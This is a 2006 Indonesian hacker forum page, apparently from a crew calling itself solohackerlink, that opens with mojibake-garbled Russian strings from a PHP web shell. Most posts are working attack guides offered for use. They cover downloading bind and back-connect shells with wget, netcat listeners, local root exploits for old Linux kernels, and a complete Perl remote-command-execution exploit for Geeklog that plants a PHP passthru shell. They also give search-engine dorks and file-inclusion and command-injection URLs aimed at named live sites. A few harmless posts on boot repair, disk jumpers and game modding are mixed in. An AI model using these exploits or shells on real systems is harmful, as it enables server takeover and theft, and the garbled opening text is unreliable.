´ru_butt10´=>´ГГГ ГГ Г Г ЁГІГј´,
´ru_butt11´=>´ГђГҐГГ ГЄГІГЁГГГ ўГ ГІГј´,
´ru_text44´=>´ГђГҐГГ ГЄГІГ ЁГГ Г ўГ ГГ ЁГҐ ГґГ ГГГ ГГ ҐГўГГ Г ГГГ Г !
ГГГ ГІГіГЇ ГІГГ Гј ГЄГ Г ГГї Г ГІГҐГГЁ Гї!´,
´ru_text45´=>´Г Г ГГ Г Г ГГ Г Г ГҐГ´ ,
´ru_text46´=>´ГЏГГ Г ГГ ГІГ phpinfo()´,
´ru_text47´=>´ГЏГГ Г ГГ ГІГ Г Г Г ГІГГ ГҐГЄ php.ini´,
´ru_text48´=>´Г ГГ Г Г ҐГГ ЁГҐ ГўГ ГҐГ ГҐГГ ГГ Г ґГ ГГГ Гў´,
´ru_text49´=>´Г ГГ Г Г ҐГГ ЁГҐ ГГЄГ ГЁГЇГІГ Г Г ГҐГ Г ўГҐГ Г ´,
´ru_text50´=>´Г ГГ ґГ ГГ Г Г Г ЁГї Г ГЇГ Г Г ГҐГ Г Г ГГ Ґ´,
´ru_text51´=>´Г ГГ ґГ ГГ Г Г Г ЁГї Г ГЇГ ГГїГІ ГЁ´,
´ru_text52´=>´Г ГҐГЄГГІ ГГ Гї ГЇГГЁ ГГЄГ ´,
´ru_text53´=>´Г ГГЄГ ГІГј Гў ГЇГ ГЇГЄГҐ´,
´ru_text54´=>´ГЏГГ ЁГГЄ Г ІГҐГЄГГІ Г Гў ГґГ Г ГГ Г ´,
´ru_butt12´=>´ГЌГ ГГІГ Ё´,
´ru_text55´=>´Г ГГ ГјГЄГ Г ў ГґГ ГГГ Г´ ,
´ru_text56´=>´ГЌГЁГ ГҐГЈГ Г ГҐ ГГ Г ГГҐ ГГ´ ,
´ru_text57´=>´Г ГГ ГГ ГІГј/ГГ Г Г ГЁГІГј ГГ Г Г /ГГ ЁГГҐГЄГІГ Г Г ЁГѕ´,
´ru_text58´=>´Г ГГї´,
´ru_text59´=>´Г Г ГГ ´ ,
´ru_text60´=>´Г ГЁГГ ҐГЄГІГГ Г ЁГѕ´,
´ru_butt13´=>´ГГГ ГГ ГІГј/ГГ Г Г Г ЁГІГј´,
´ru_text61´=>´Г Г ГГ Г Г ГГ Г Г´,
´ru_text62´=>´Г ГЁГГ ҐГЄГІГГ Г ЁГї Г ГГ Г Г Г Г ´,
´ru_text63´=>´Г Г ГГ Г іГГ Г ГҐГ ´ ,
´ru_text64´=>´Г ГЁГГ ҐГЄГІГГ Г ЁГї ГіГГ ГГҐ ГГ ´,
´ru_text65´=>´Г ГГ ГГ ГІГј´,
´ru_text66´=>´Г ГГ Г Г ЁГІГј´,
´ru_text67´=>´Chown/Chgrp/Chmod´,
´ru_text68´=>´ГЉГ ГГ Г Г Г ´,
´ru_text69´=>´ГЏГ Г Г Г ГҐГІГ1 ´,
´ru_text70´=>´ГЏГ Г Г Г ГҐГІГ2 ´,
´ru_text71´=>"Г ГІГГ ГГ ГЇГ Г Г Г ГҐГІГ ГЄГ ГГ ГГ Г: - ГГГї C HOWN -
ГЁГГї ГГ Г ўГ ГЈГ ГЇГ Г Гј ГГ Г ўГ ГІГҐГГї ГЁГ ГЁ ГҐГЈГ UID (ГГ ЁГГ ГГ )-
ГГГї ГЄГ ГГ ГГ Г C HGRP - ГЁГГї ГЈГГі ГЇГЇГ Г ЁГГ Ё GID (ГГЁ ГГ ГГ ) -
ГГГї ГЄГ ГГ ГГ Г C HMOD - Г ГҐГГ ГҐ ГГЁ ГГ ГГ ў
ГўГГ ГјГГҐ ГГЁ ГГ ГГ ГЇГ ГҐГ Г Г ІГ ГўГ ГҐГ ГЁГЁ (Г Г ГЇГГ ЁГ ГҐГ 0777)",
´ru_text72´=>´Г ГҐГЄГГІ ГГ Гї ГЇГГЁ ГГЄГ ´,
´ru_text73´=>´Г ГГЄГ ГІГј Гў ГЇГ ГЇГЄГҐ´,
´ru_text74´=>´Г ГГЄГ ГІГј Гў ГґГ ГГ Г Г´,
´ru_text75´=>´* ГГ Г ГГ ГЁГ ГЇГГ ГјГГ Г ўГ ГІГј ГГҐГЈГ іГГїГГ Г ГҐ Г ўГ Г Г
ГГҐГ Г ЁГҐ´,
´ru_text76´=>´ГЏГГ ЁГГЄ Г ІГҐГЄГГІ Г Гў ГґГ Г ГГ Г Г ГЇГ Г Г Г №ГјГѕ
ГіГІГЁГГ ЁГІГ f ind´,
´ru_text77´=>´ГЏГГ Г ГГ ГІГ Г ГІГ ГіГЄГІГіГГ ГЎГ ГГ Г Г Г ГГ Г´,
´ru_text78´=>´ГЏГГЄГ Г Г Г ўГ ГІГј ГІГ ГЎГГ ЁГГ ´,
´ru_text79´=>´ГЏГГЄГ Г Г Г ўГ ГІГј ГГІ ГГ ГЎГГ ´,
´ru_text80´=>´Г ГЁГЇ´,
´ru_text81´=>´Г ГҐГІГј´,
´ru_text82´=>´ГЃГ Г Г Г Г Г Г Г Г´ ,
´ru_text83´=>´Г ГГЇГ Г ГГ ҐГГЁ ГҐ SQL ГГ ГЇГ Г ГГ ´,
´ru_text84´=>´SQL ГГ ГЇГ Г Г ´,
´ru_text85´=>´ГЏГГ Г ўГҐГ ГЄГ ГўГГ Г ГГГ ГГ ГІГ Ё ГГ ЎГГ Г Г Г ГЈ Г Г
ГГЁ ГГ ҐГГЁ Г safe_mode ГГҐГ ГҐГ ГўГ ГЇГГ ГГ ҐГГЁ ГҐ ГЄГГ Г Г Г Г ў
MSSQL ГГҐГ Г ўГҐГ ГҐ´,
´ru_text86´=>´Г ГЄГ ГГ ЁГўГ ГГЁ ГҐ ГґГ ГГ Г Г Г ГҐГ Г ўГҐГ Г ´,
´ru_butt14´=>´ГГЄГ Г Г Г ІГј´,
´ru_text87´=>´Г Г ГЈГГ іГГЄГ Гґ Г ГГГ Гў Г Г іГГ Г ГҐ Г ГГ ГЈГ ftp-
ГГҐГ Г ўГҐГ Г ´,
´ru_text88´=>´FTP-ГГ ҐГГ ўГҐГ: ГЇГГГІ ´,
´ru_text89´=>´Г Г ГГ Г Г ftp Г ГҐГГ ўГҐГ ГҐ´,
´ru_text90´=>´ГђГҐГГ ЁГ Г ЇГҐГГҐГГ ГГ Ё´,
´ru_text91´=>´ГЂГГ ГЁ ГўГЁГ Г ГўГ ГІГј Гў´,
´ru_text92´=>´ГЎГҐГ Г Г Г ГЁ ГўГ Г ГЁГЁ´,
´ru_text93´=>´FTP´,
´ru_text94´=>´FTP-ГЎГГі ГІГґГГ Г´,
´ru_text95´=>´Г ГЇГЁГГ ГЄ ГЇГ Г ГјГГ Г ўГ ГІГҐГ ГҐГ´ ,
´ru_text96´=>´ГЌГҐ ГіГГ Г Г Г Гј ГЇГГ ГіГ ГЁГІГј ГГЇГ ЁГГ ГЄ Г ЇГГ ГјГГ Г ўГ
ГІГҐГ ГҐГ´ ,
´ru_text97´=>´ГЏГГ Г ўГҐГ ГҐГГ ГЄГ ГГЎ ГЁГГ ГГ ЁГ : ´,
´ru_text98´=>´Г ГГ Г Г ГГ ГЇГГ ГЄГГѕ ГГҐГ Г ЁГ: ´ ,
´ru_text99´=>´* Гў ГЄГ ГГҐ Г ГІГўГҐ ГГ ГЈГЁГГ Г Ё ГЇГ ГГ ГГї
ГЁГГЇГ ГГјГ Г іГҐГІГГї Г ЁГГї ГЇГГ ГјГГ Г ўГ ГІГҐГГї ГЁГ /etc/passwd´,
´ru_text100´=>´ГЋГІГЇГ Г ГўГЄГ ГґГ ГГ ГГ ў ГГ ГіГ Г Г ГҐГГ ГГ Г ґГІГЇ
ГГҐГ Г ўГҐГ ´,
´ru_text101´=>´ГГ ГЇГГ ГјГГ Г ўГ ГІГј ГІГ ГЄГ ГҐ ГЇГҐГГҐГ ўГҐГГ ГіГІГГ Ґ (user ->
resu) ГЁГГї ГЇГГ Гј ГГ ГўГ ГІГҐГГї Г ў ГЄГ ГГҐГ ГІГ ўГҐ ГЇГ ГГ ГГї´ ,
´ru_text102´=>´ГЏГГ ГІГ ´,
´ru_text103´=>´ГЋГІГЇГ Г ГўГЄГ ГЇГЁГ ГјГГ ´,
´ru_text104´=>´ГЋГІГЇГ Г ГўГЄГ ГґГ ГГ Г Г Г ГЇГ Г ГІГ Г ўГ Г ГїГ№ГЁ&

Post by : arnand on [ 03 April 2006 03:35:39 ]

Rooting
Rooting :D

1.untuk melakukan rooting tidak bisa di eksekusi pada browser; so kita harus
menggunakan bind ; dan apabila bind juga tidak bisa di gunakan maka cara berikut nya
adalah menggunakan konek backshell
-bind : cara pasanag bind
$wget solpot.info/shell.tar
$tar -zxvf shell.tar;cd webshell;./1980
$kemudian buka putty kamu
$isi nama web dan port 1980 untuk koneksi
$source putty >> http://solpot.info/putty.exe
-konekback shell
$kamu harus mempunyai netcat.exe plus ip publik
$source netcat >> http://solpot.info/netcat.exe
$buka cmd.exe cara nya >> klik tombol start pada windows > klik run > isi cmd.exe pada
kolom > ketik enter
$kemudian windows dos akan terbuka dan cobalah ketik ipconfig untuk melihat ip kamu
$kemudian ketik pada layar dos kamu >> netcat -l -p 1000 -v
$dan kompie kamu akan listening pada port 1000
$selanjut nya upload back.txt yg digunakan untuk koneksi ke kompie kita
$wget solpot.info/back.txt
$langkah terakhir untuk listening ke kompie kamu adalah :
$perl back.txt ip port
$ex : perl back.txt 220.2.16.100 1000
2.exploit untuk rooting
-kernel 2.2.x thn 2002 below
$wget solpot.info/ptrace-kmod
$chmod 777 ptrace-kmod
$./ptrace-kmod
#whoami
root
-kernel 2.4.x thn 2003 below
$wget solpot.info/elflbl
$chmod 777 elflbl
$./elflbl
#whoami
root

good luck Laughing

#solpotcrew was here......

Post by : pinguingilo on [ 14 March 2006 00:10:43 ]

Local root LiNuX 2.4.20

1.target cari dulu !!!
2.pasang bind doloe kalee yach Very Happy
wget roseofworld.org/shell.tar
tar -zxvf shell.tar;cd webshell;./1980
3.buka putty kamu
pilih telnet
isi port : 1980
4.upload local root
wget roseofworld.org/root.tar.gz
tar -zxvf root.tar.gz
cd root
./loginx 1970 1970
jika kamu beruntung maka kluar tanda #
jika tidak beruntung kasian dech loe hueheueheuhe

good luck
#SOLPOTCREW Was Here....

Post by : pinguingilo on [ 14 March 2006 00:07:14 ] 222.124.7.114

Reply no: 1

Link tidak jalan source bind n local ada di : http://www.darqo.or.id/toolx/

Reply by : pinguingilo on [ 14 March 2006 00:09:20 ] 222.124.7.114

guestbook script bugs

1. buka google keyword : "powered by guestbook script"

2. untuk mengetahui bugs web tersebut or udah di patch or blum letakin url berikut :
http://target.com/guestbook/index.php?include_files[]=&include_files[1]=/var/log/httpd/access_log

3. klo webnya nggak di patch jalanin berikut :

http://target.com/guestbook/index.php?include_files[]=&include_files[1]=injekan

good luck !!! nice hacking men............

Post by : p on [ 13 March 2006 23:50:09 ] 222.124.7.114

Geeklog 1.* remote commands execution

running pake shell ::

#!/usr/bin/perl -w
use IO::Socket;
print
"***********************************************************************
** ";
print "| Geeklog 1.* remote commands execution | ";
print "| By rgod rgod<AT>autistici<DOT>org | ";
print "| site: http://retrogod.altervista.org | ";
print "| | ";
print
"***********************************************************************
** ";
print "| -> this works against magic_quotes_gpc = Off | ";
print
"***********************************************************************
** ";
sub main::urlEncode {
my ($string) = @_;
$string =~ s/(W)/"%" . unpack("H2", $1)/ge;
#$string# =~ tr/.//;
return $string;
}

$serv=$ARGV[0];
$path=$ARGV[1];
$cmd=""; for ($i=2; $i<=$#ARGV; $i++) {$cmd.="%20".urlEncode($ARGV[$i]);};

if (@ARGV < 3)
{
print "Usage: ";
print "perl pblg_xpl.pl SERVER PATH COMMAND ";
print "SERVER - Server where Geeklog is installed. ";
print "PATH - Path to Geeklog (ex: /geeklog/ or just /) ";
print "COMMAND - a shell command ("cat ./../config.php" to see database ";
print " username & password") ";
print "Example: ";
print "perl geeklog_14_xpl.pl localhost /geeklog/ ls -la ";
exit();
}

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10,

PeerPort=>"http(80)")
or die "[+] Connecting ... Could not connect to host. ";

$shell=´<?php ob_clean();echo"Hi Master! ";ini_set("max_execution_time",0);passthru

($_GET[CMD]);die;?>´;
$shell=urlEncode($shell);
$data="loginname=sun&passwd=sun";
print $sock "POST ".$path."users.php HTTP/1.1 ";
print $sock "Host: ".$serv." ";
print $sock "Content-Length: ".length($data)." ";
print $sock "Cookie: gl_session=%27".$shell." ";
print $sock "Connection: Close ";
print $sock $data;
close($sock);

$sock = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$serv", Timeout => 10,

PeerPort=>"http(80)")
or die "[+] Connecting ... Could not connect to host. ";

$xpl="../logs/error.log";
$xpl=urlEncode($xpl)."%00";
print $sock "GET ".$path."index.php?CMD=".$cmd." HTTP/1.1 ";
print $sock "Host: ".$serv." ";
print $sock "Cookie: language=".$xpl."; ";
print $sock "Connection: Close ";

while ($answer = <$sock>) {

print $answer;
}
close($sock);

original taken from exploitercode

Post by : pinguingilo on [ 13 March 2006 23:24:47 ]

FarsiNews
keyword "powered by farsiNews"

http://[target]/loginout.php?cmd=dir&cutepath=injekan

Post by : pinguingilo on [ 13 March 2006 00:32:20 ] 222.124.7.114

Lets Fix the problem

/************************************
Author : ___tar_gz
Title : Boot
Dedicated to : Newbie
************************************/

Saat kita meng-Install Linux berdampingan dengan MS-Win, maka yang terpakai adalah
bootloader milik linux. Urutannya Pertama kali yang ada di Hard-Disk biasanya
Windows, dan setelah itu barulah Linux.
Komputer memerlukan informasi Boot record untuk proses booting. Dengan menginstall
Linux setelah Windows, berarti BootLoader Linux meng-Cover (tidak mengoverwrite)
bootloader dari Windows. Bootloader windows berfungsi kembali saat kita memilih opsi
Windows pada BootLoader linux (LILO, GRUB, dan lainnya).
Permasalahan biasanya terjadi pada saat ingin menghilangkan Linux dari Hard-Disk.
Komputer tidak mau booting. Ada apa gerangan ...?
Komputer kehilangan Informasi boot setelah kita meng-Uninstall Linux walaupun
Informasi boot milik windows masih ada, tapi tidak ada informasi kearah sana. Untuk
dapat memperbaikinya bisa digunakan CD dari MSWin. Tapi bukan untuk meng-Install
ulang. Windows selalu meng-Overwrite Boot Record dan hanya memeriksa apakah ada
OS Microsoft lainnya di Hard-Disk tersebut dan tidak peduli terhadap OS non MS. Hal
ini dapat kita manfaatkan. Kita boot memakai CD Windows. Pada awalnya mirip seperti
proses install ulang, tapi yang perlu diingat, Partisi yang berisi OS tidak perlu di format.
Setelah sampai pada proses "Copy file bla-bla-bla" langsung restart. Sudah bisa Booting
ke Windows (karena Informasi boot sudah ada)
Dengan cara ini, diharapkan tidak ada orang yang merasa menyesal telah mencoba Linux.
Making Linux so easy...(katane XNUXER LINUX).... :)
Kalo semua bisa pake Linux kan Warnet ber-OS Linux jadi laku... hehehe (marai user´e
arang sing gelem gae Linux OM...)

Post by : ___tar_gz on [ 06 March 2006 18:47:43 ]

Bug jaman batu (sekedar mengingatkan)

/****************************************
Author : ___tar_gz
Title : pswd (mengingatkan)
Dedicated to : NewBie euy...
****************************************/

Saat menginstall Linux, kita disuruh mengisi daftar user serta jabatannya. Jika terlupa,
atau di Skip, maka saat instalasi selesai dan ingin Login bisa di coba :
Name : Administrator
Pswd : Root

Bug WinXP SP1 ternyata masih banyak yang belum mengerti.

1. Pada Antarmuka Login gunakan ctrl+alt+del.
2. Antarmuka klasik terlihat dan isikan Administrator pada baris nama dan kosongkan
password.

Berdasar pengalamanku di kota kecil, banyak yang belum mengerti Bug yang sudah lama
ini. Jadi saya pikir ada gunanya untuk sekedar mengingatkan, khususnya teman-teman
yang jadi admin Warnet. Cepat di patch atau ganti...

Post by : ___tar_gz on [ 06 March 2006 18:35:49 ]

Set Hard-Disk

/****************************************
Author : ___tar_gz
Title : Setting Hard-Disk
Dedicated to : Newbie
****************************************/

Banyak yang mengeluh kesulitan memasang Hard-Disk Western Tech. Sudah mengira
memasang dengan benar, tapi boot selalu gagal.
Susunan Jumper-nya memang beda dengan Hard-Disk lain. keterangannya nempel di
Hard-Disk (delok dewe ae)
Yang menyulitkan jika komputer hanya punya 1 kabel ATA, 1 Hard-Disk, dan 1 Jumper
kemudian mau di tambahkan HardDisk Western Tech., OS berada pada hard-Disk lama
berisi WinXP dan Linux (Hard-Disk lama
awalnya pada posisi Master)
Jalan keluarnya pasang Hard-Disk seperti biasa, namun keduanya tanpa Jumper (Jumper
tidak di gunakan), berarti Master ada di HardDisk Western Tech. Lalu masuk ke BIOS...
Hard-Disk Western Tech-nya di disable...(agar boot dari hardDisk lama) jika sudah,
booting seperti biasa... masuk ke WinXP sudah bisa, HardDisk Western Tech.-nya juga
terbaca, jika tidak, masuk ke "Device Manager" dan "Scan for hardware changes". Tapi
kalo mau masuk Linux, harus dikembalikan ke setelan awal, karena Linux kesulitan
mengenali posisi Hda jika Hard-Disk dipindah-pindah posisi master/slave, namun jika
tetap ingin pakai Linux dengan kedua Hard-Disk terpasang ya harus punya 2 jumper.

Salam Sejahtera
Wassalam

Post by : ___tar_gz on [ 06 March 2006 18:22:12 ]

Decompiling GTA

/************************************
Author : ___tar_gz
Title : Recompile GTA
Tool : GTA Mission Builder
Dedicated to : NewBie
************************************/
Kalau komunitas solohackerlink sendiri saya yakin tidak akan membaca tulisan ini, tapi
tulisan ini memang dibuat untuk pengunjungnya aja :)
Bosan dengan game buatan sendiri...?
Jika ingin bermain game se-Nikmat bermain dengan game buatan sendiri, bisa dicoba
GTA dengan Tool-nya GTA Mission Builder.
GTA Mission Builder ibarat SOFTICE-nya GTA... berfungsi untuk melakukan decompile
terhadap file mission script (*.scm)

Script yang berisikan misi, selalu diawali seperti contoh dibawah ini…

;-------------Mission 55---------------
; Originally: Hog Tied

Saya ambil contoh misi “Hog Tied” pada GTA sekuel Vice City…
Cari kata M_FAIL dan M_PASS.
Ingat… M_FAIL di misi 55 beda dengan M_FAIL di misi lainnya, begitu

juga dengan M_PASS.

M_FAIL berisi nilai “anda belum beruntung”, dan M_PASS berisi nilai

“anda telah menyelesaikan misi dan boleh lanjut” :)

Pada misi 55, M_FAIL terdapat pada :

:Label0CF77A
00BA: text_styled "M_FAIL" 5000& ms 1? \ MISSION FAILED!
0051: return

note: yang diperhatikan = Label0CF77A

dan M_PASS terdapat pada :

:Label0CF78B
0004: 1108?? = 1? \ integer values
0318: set_latest_mission_passed "BIKE_3" \ Hog Tied
030C: set_mission_points += 1?
0394: play_music 1?
0110: clear_player $PLAYER_CHAR wanted_level
01E3: text_1number_styled "M_PASS" 4000& 5000& ms 1? \ MISSION

PASSED! $~1~
0109: player $PLAYER_CHAR money += 4000&
0164: disable_marker 1096??
0051: return

note: yang diperhatikan = Label0CF78B

Coba periksa semua pernyataan di blok mission 55. Apakah ada nilai

yang mengarah ke Label0CF77A dan Label0CF78B ….!

Setelah dicari-cari, saya menemukan salah satunya masing-masing di :

:Label0CF74E
009B: destroy_actor_instantly 21380??
00A6: destroy_car 21128??
02A3: toggle_widescreen 0? (off)
01B4: set_player $PLAYER_CHAR frozen_state 1? (unfrozen)
01F7: set_player $PLAYER_CHAR ignored_by_cops_state_to 0? (false)
03BF: set_player $PLAYER_CHAR ignored_by_everyone_to 0? (false)
02EB: restore_camera_with_jumpcut
0002: jump £Label0CF78B -----> ini dia

dan

:Label0CF716
00D6: if 0?
0118: actor 21380?? dead
004D: jump_if_false £Label0CF72D
0002: jump £Label0CF77A -----> ini dia

Pada Label0CF716 ada yang berisi ---> 0002: jump £Label0CF77A.

Ubah nilai £Label0CF77A (yang lompat ke M_FAIL) dengan £Label0CF78B (agar
lompat ke M_PASS).
Disini kita belum memiliki kemenangan 100%, karena hanya merubah kondisi pada :
Label0CF716. Jika ingin kemenangan absolut, replace blok :Label0CF77A dengan blok :
Label0CF78B.
Jadi nanti, dalam kondisi apapun juga, Misi 100% berhasil (M_FAIL = M_PASS).
Untuk GTA sekuel lainnya mudah2an sama (tapi yang harus diingat, Versi GTA Mission
Builder berbeda untuk setiap sekuel GTA)
GTA Mission Builder memang dibuat untuk mengkostumisasi permainan ini.
Kita bisa membuat script sendiri untuk bersenang-senang, terutama bagi yang sudah
lancar menggunakan bahasa pemrograman tingkat tinggi. Bagi yang belum bisa,
tergantung Logika kamu bagaimana, memahaminya tidak sulit.
Hanya untuk iseng-iseng saja (lek mumet mikir) atau males main game buatan sendiri
(palng banter tetris... pokoke Under DOS kekekeke)

Salam Sejahtera
Wassalam

Post by : ___tar_gz on [ 06 March 2006 18:11:30 ]

Modif GUI Linux

/********************************
Author : ___tar_gz
Title : Modif GUI Linux
Dedicated to : Pemula Linux
********************************/

Bagaimana cara merubah appearance buatan kamu sendiri pada Linux

Aku mau ambil contoh side image di Kmenu (itu lho, yang ada gambar
Vertikal di Sebelah kiri kmenu)
bagaimana cara merubah gambarnya...?
coba buka : /opt/kde3/share/apps/kicker/pics
Sudah lihat gambarnya ?
eiiitt...jangan ambil kesimpulan dulu. Buka konqueror super user mode atau
dari text mode dengan mengetikan SU terlebih dahulu untuk mendapat akses
root.
Buka /home/nama_kamu/.kde/share/
tambahkan ----> apps/kicker/pics
ke
/home/omri/.kde/share/apps/
sehingga menjadi
/home/omri/.kde/share/apps/kicker/pics
dengan logika
/home/omri/.kde/share/ = A
/opt/kde3/share/ = B
A=B ; atau /home/omri/.kde/share/ = /opt/kde3/share
jadi A/kicker/pics = B/kicker/pics
...OCLE....!

wis...jajalen wae...
copy-paste file :
kside.png yang ada di
: opt/kde3/share/apps/kicker/pics/kside.png
ke
home/omri/.kde/share/apps/kicker/pics/kside.png
nah yang ada di:
/home/omri/.kde/share/apps/kicker/pics/kside.png bisa di edit

kesimpulannya sudah diterangkan bahwa A=B...semua yang ada di A dibaca

lebih dulu ketimbang B...kalau tidak ada file di A, berarti, B yang

dibaca. jadi kalo pengen edit, buat sebuah duplikat yang ada B ke

direktori A
Jika sudah bosan, kita tinggal menghapus file yang ada di
Reply no: 1

Sing wis Jago jo komentar ya... kie buat wong mampir ae :)

itung-itung promosi Linux... om... tante...

Reply by : ___tar_gz@linuxmail.org on [ 06 March 2006 18:27:42 ]

202.63.231.150
Reply no: 2

direktori /opt/kde3/share/apps/distribusi pada distribusi selain SuSE berada di /

usr/share/apps/

Reply by : ___tar_gz on [ 12 March 2006 17:06:13 ]

bugs mene....

ada bugs baru… dan berhasil… boleh di coba.. walo gw males nyari target…

buka google inurl:”option=frontpage”

index.php?option=frontpage&Itemid=system(uname)
index.php?option=frontpage&Itemid=system(ls)

contoh http://asi.insa-
rouen.fr/~scanu/Site/index.php?option=frontpage&Itemid=system(uname)

Comex
http://ali.asnawi.or.id

Post by : Comex on [ 02 March 2006 13:01:28 ] 202.127.111.20

"Powered by iUser"

keyword : "Powered by iUser"

bug : common.php?include_path=ijekan

ex :
http://www.directorygold.com/shopping/eware/common.php?include_path=injekan

Post by : pinguingilo on [ 27 February 2006 07:00:21 ] 202.93.35.220

PenGHancur Shell PhP

http://[target]/[path]/include.php?path=\192.168.1.2cshell.php

http ://[target]/[path]/
include.php?path=ftps://username:password@somehost/shell.php

coBa Aja
Cari TarGet shell PhP Moe terus MasukKan Bugs Nya ke saNa

Post by : ToxiCity on [ 26 February 2006 02:08:19 ] 216.236.119.227

Reply no: 1

Epsss Salah Mksd aku MemBUat Locker Di shell Php Jadi Admin

Reply by : ToxiCity on [ 26 February 2006 02:47:45 ]

Bugs LaMa APa NgGak Yakz

allinurl:4nAlbum site:.org
allinurl:PNphpBB2 site:.org
/modules/4nAlbum/public/displayCategory.php?basepath=
/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=

test aja Deh MungkIn sapa tau andA BerunTunG

ueeuheuheuhe

bugs itu munGkIn NGgak Basi Lage di Liat

euehueheue
nTar deh Kalau dapet Bugs Baru aku Kasi satu deh

okeh Mas Mas om Oms

Post by : ToxiCity on [ 25 February 2006 23:56:38 ]

Test Bugs Baru

EheM NeH KayaK Nya BuGs Baru Apa NgGak Yakzzzzz

soAL Nya aku Baru liat Jadi MungkIn Bagi aku Baru
aku BoNGKaR BOnGKar http://www.milw0rm.com tingGaL di search deh Keyword
Yang MaU Kmoe Cari
neh
keyword Yang aku dapet dari sanA ..

/skin/zero_vote/error.php

/skin/zero_vote/error.php?dir=http://[ATTACKER]

allinurl:/skin/zero_vote/error.php
allinurl:/zero_vote/error.php

euheuhe Met COba Om Om YaNg Liat Nya.....

kakek kakek PuN Pun Boleh Liat Kalau Kakek Itu Maseh Super ...
super MAn Kale..

Cayo #solohackerlink

Post by : ToxiCity on [ 25 February 2006 23:48:56 ]